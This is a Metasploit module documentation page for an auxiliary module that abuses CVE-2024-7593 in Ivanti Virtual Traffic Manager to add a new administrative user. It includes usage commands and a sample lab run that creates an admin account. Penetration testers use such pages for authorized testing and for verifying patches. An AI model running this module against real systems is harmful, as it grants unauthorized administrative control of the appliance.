documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new administrative user to the web interface of the application.
Affected versions include:
The vendor published an advisory [here] (https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).
A proof-of-concept is available here.
Docker images with the software are available from here.
Successfully tested on
msfconsoleuse auxiliary/admin/http/ivanti_vtm_adminset RHOSTS <IP>runUsername to be used when creating a new user with admin privileges.
Password to be used when creating a new user with admin privileges.
Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in an output similar to the following:
msf > use auxiliary/admin/http/ivanti_vtm_admin
msf auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
msf auxiliary(admin/http/ivanti_vtm_admin) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[+] New admin user was successfully added:
h4x0r:w00Tw00T!
[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed